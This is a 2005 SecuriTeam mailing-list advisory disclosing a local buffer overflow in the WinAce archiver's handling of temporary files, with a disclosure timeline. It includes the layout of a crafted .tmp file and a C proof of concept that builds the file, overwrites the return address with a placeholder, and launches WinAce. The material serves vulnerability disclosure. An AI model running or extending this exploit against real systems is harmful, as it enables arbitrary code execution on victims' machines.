[EXPL] WinAce Temporary File Handling Buffer Overflow

From: SecuriTeam (support_at_securiteam.com)
Date: 08/25/05

  • Next message: SecuriTeam: "[EXPL] GTChat Remote Denial Of Service And Directory Traversal" 
    To: list@securiteam.com
Date: 25 Aug 2005 12:08:45 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      WinAce Temporary File Handling Buffer Overflow
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.winace.com/winace.html> WinAce is an archiving utility with
    an easy-to-use interface for creating, extracting, and viewing archives."

    Local exploitation of a buffer overflow vulnerability in WinAce allows
    attackers to execute arbitrary code.

    DETAILS

    Vulnerable Systems:
     * WinAce version 2.6.0.5 (earlier versions suspected)

    When WinAce attempts to compress any file, firstly it creates temporary
    file which contains the location of the file which will be compressed. The
    problem specifically exists when parsing temporary files that contain long
    file entries.

    An example malicious .tmp file with a long file name:
            c:\AAAAAAAAA...[A x 2021 bytes is where the EIP
    starts]1234[AAAA...AAAAA]\r\n

    Command line:
            "C:\Program Files\WinAce\winace.exe" a "C:\Program
    Files\WinAce\winace" @c:\crafted.tmp

    '[A x 2021]' represents any string of 2021 bytes in length. Opening either
    malicious tmp file on the Microsoft Windows platform will cause WinAce to
    crash with an access violation when attempting to execute instruction
    0x34333231, which is the little-endian ASCII code representation of
    '1234'. An attacker can exploit this vulnerability to redirect the flow of
    control and eventually execute arbitrary code. This example is specific to
    the Microsoft Windows platform.

    Exploitation requires that an attacker to execute arbitrary command line
    which contain location of malicious tmp file.

    Disclosure Timeline:
    22.07.05 - Initial vendor notification
    25.07.05 - Initial vendor response
    19.08.05 - Public disclosure

    Proof of concept:
    /*
    *
    * WinAce Temporary File Parsing Buffer Overflow Vulnerability
    * http://www.winace.com/winace.html
    * Discovered & Coded By ATmaCA
    * Web: atmacasoft.com && spyinstructors.com
    * E-Mail: atmaca@icqmail.com
    * Credit to kozan
    *
    */

    /*
    *
    * Tested with WinAce 2.6.0.5 as installed on the Win XP Sp2 En platform
    *
    */

    #include <windows.h>
    #include <stdio.h>

    void main()
    {
            // create crafted command line
            char tmpfile[] = "c:\\crafted.tmp";
            char winacepath[] = "\"C:\\Program Files\\WinAce\\winace.exe\"";
            char compresspar[] = " a \"C:\\Program Files\\WinAce\\winace\" @";
            char runpar[300];
            int i = 0;
            char Ret_Addr[]= "\x31\x32\x33\x34";

            strcpy(runpar,winacepath);
            strcat(runpar,compresspar);
            strcat(runpar,tmpfile);

            // create crafted .tmp file
            FILE *di;
            if( (di=fopen(tmpfile,"wb")) == NULL ){
                    return;
            }

            fprintf(di,"c:\\");

            for(i=0;i<2013;i++)
                    fputc(0x41,di);

            // Overwriting the return address (EIP)
            fprintf(di,Ret_Addr); //EIP

            for(i=0;i<178;i++)
                    fputc(0x41,di);

            // end of file
            fprintf(di,"\x2E\x74\x78\x74\x0D\x0A");

            fclose(di);
            WinExec(runpar,SW_SHOW);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:atmaca@icqmail.com> ATmaCA.
    The original article can be found at: <http://www.atmacasoft.com>
    http://www.atmacasoft.com

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] GTChat Remote Denial Of Service And Directory Traversal"

    Relevant Pages